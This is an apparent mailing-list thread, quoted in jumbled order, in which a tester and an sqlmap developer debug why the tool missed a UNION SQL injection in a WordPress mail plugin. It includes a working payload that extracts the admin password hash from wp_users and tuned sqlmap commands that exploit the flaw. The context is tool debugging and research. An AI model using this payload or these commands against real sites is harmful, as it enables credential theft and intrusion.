Yeah, no worries. Was just playing around with it and was surprised sqlmap
didn't find the UNION.
I think what is happening is sqlmap is changing up the value of tray during
the union tests to negative numbers, and it is required to be 'in_deleted'
(but hey, that's what --prefix is for)
Thanks!
Looking into traffic file I don't see "obvious" trails of SQLi. If you are
satisfied with your findings I won't look any further.
Bye
On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry
wrote:
>
> Aha, I got it:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
> -p tray -
Sorry, one more thing to note, the following command gets very close to
exploiting the injection:
./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
/tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
LIMIT 1,1#" --union-char=f --prefix='in_deleted '
The on
Aha, I got it:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
-p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080
--technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5
--risk=3 -o _
___ ___| |_ ___ ___ {1.0-dev-180ede0}
Playing with the queries sqlmap sends a bit more:
action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
This results in a 0 being returned where the password hash was in the
successful injection:
1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
^ injection result
Hi.
I don't see a reason why this form of UNION test would be any different
than the regular used by sqlmap. Can you please send me the traffic file
for such run (... --flush-session -t traffic.txt) along with console
output?
Bye
On Dec 15, 2014 5:50 PM, "Brandon Perry" wrote:
> Hello!
>
> Play
Hello!
Playing around with the following vulnerabivlity:
http://www.exploit-db.com/exploits/35505/
Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
result in a response from the server with the hash o
